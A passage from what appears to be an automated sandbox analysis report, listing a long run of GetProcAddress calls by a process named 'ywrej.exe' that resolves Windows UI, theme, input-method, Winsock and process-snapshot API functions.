\"GetProcAddress\" with a parameter RemoveMenu (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ReleaseDC (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ReleaseCapture (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegisterClipboardFormatW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegisterClassW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RedrawWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter PtInRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter PostQuitMessage (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter PostMessageW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter PeekMessageA (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter PeekMessageW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter OffsetRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter MsgWaitForMultipleObjectsEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter MsgWaitForMultipleObjects (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter MessageBoxW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter MapWindowPoints (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter MapVirtualKeyW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LoadKeyboardLayoutW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LoadIconW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LoadCursorW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LoadBitmapW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter KillTimer (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsZoomed (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsWindowVisible (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsWindowUnicode (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsWindowEnabled (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsIconic (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsDialogMessageA (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsDialogMessageW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsChild (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InvalidateRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IntersectRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InsertMenuItemW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InsertMenuW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InflateRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessId (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetWindowTextW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetWindowRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetWindowPlacement (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetWindowLongW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetWindowDC (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetUpdateRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetTopWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetSystemMenu (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetSysColorBrush (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetSysColor (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetSubMenu (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetScrollRange (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetScrollPos (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetScrollInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetPropW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetParent (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetMessagePos (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetMessageExtraInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetMenuStringW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetMenuState (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetMenuItemInfoW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetMenuItemID (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetMenuItemCount (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetMenu (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetLastActivePopup (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetKeyboardState (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetKeyboardLayoutNameW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetKeyboardLayoutList (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetKeyboardLayout (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetKeyState (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetKeyNameTextW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetIconInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetForegroundWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetFocus (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetDlgItem (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetDesktopWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetDCEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetDC (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCursorPos (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCursor (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetClipboardData (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetClientRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetClassLongW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetClassInfoW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCapture (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetActiveWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FrameRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FindWindowExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FindWindowW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FillRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnumThreadWindows (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnumChildWindows (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EndPaint (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnableWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnableScrollBar (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnableMenuItem (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawTextExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawTextW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawMenuBar (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawIconEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawIcon (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawFrameControl (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawFocusRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawEdge (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DispatchMessageA (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DispatchMessageW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DestroyMenu (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DestroyIcon (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DestroyCursor (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DeleteMenu (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DefWindowProcW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DefMDIChildProcW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DefFrameProcW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreatePopupMenu (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateMenu (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateIcon (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateAcceleratorTableW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CopyIcon (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ClientToScreen (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CheckMenuItem (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CharUpperBuffW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CharNextW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CharLowerBuffW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CharLowerW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CallWindowProcW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CallNextHookEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter BeginPaint (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter AdjustWindowRectEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ActivateKeyboardLayout (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter MessageBoxA (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter OpenPrinterW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnumPrintersW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DocumentPropertiesW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ClosePrinter (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetDefaultPrinterW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThreadUILanguage (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VariantChangeTypeEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarI4FromStr (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarR4FromStr (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarR8FromStr (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarDateFromStr (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarCyFromStr (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarBoolFromStr (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarBstrFromCy (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarBstrFromDate (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VarBstrFromBool (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WINNLSEnableIME (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter AnimateWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter UninitializeFlatSB (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollProp (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlatSB_EnableScrollBar (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlatSB_ShowScrollBar (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollRange (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollRange (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetLayeredWindowAttributes (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetFileSizeEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoAddRefServerProcess (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoReleaseServerProcess (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoResumeClassObjects (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoSuspendClassObjects (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter OpenThemeData (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CloseThemeData (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawThemeBackground (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawThemeText (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundContentRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundExtent (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemePartSize (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeTextExtent (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeTextMetrics (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundRegion (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter HitTestThemeBackground (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawThemeEdge (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawThemeIcon (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsThemePartDefined (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsThemeBackgroundPartiallyTransparent (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeColor (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeMetric (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeString (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeBool (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeInt (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeEnumValue (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemePosition (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeFont (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeMargins (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeIntList (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemePropertyOrigin (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetWindowTheme (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeFilename (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeSysColor (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeSysColorBrush (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeSysBool (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeSysSize (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeSysFont (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeSysString (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeSysInt (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsThemeActive (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsAppThemed (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetWindowTheme (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnableThemeDialogTexture (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsThemeDialogTextureEnabled (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeAppProperties (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetThemeAppProperties (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCurrentThemeName (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThemeDocumentationProperty (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawThemeParentBackground (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnableTheming (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawThemeTextEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter HIMAGELIST_QueryInterface (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawShadowText (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawSizeBox (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DrawScrollBar (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SizeBoxHwnd (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ScrollBar_MouseMove (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ScrollBar_Menu (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter HandleScrollCmd (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DetachScrollBars (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter AttachScrollBars (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CCSetScrollInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CCGetScrollInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CCEnableScrollBar (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter QuerySystemGestureStatus (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegisterClassNameW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegisterDragDrop (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetNameInfoW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InetPtonW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InetNtopW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetAddrInfoExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WSASetSocketPeerTargetName (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WSADeleteSocketPeerTargetName (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WSAImpersonateSocketPeer (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WSAQuerySocketSecurity (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WSARevertImpersonation (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter MonitorFromWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Heap32ListFirst (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Heap32ListNext 